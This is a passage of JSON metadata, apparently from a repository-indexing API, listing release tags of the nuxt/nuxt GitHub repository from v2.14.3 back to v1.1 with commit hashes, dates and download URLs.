6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.e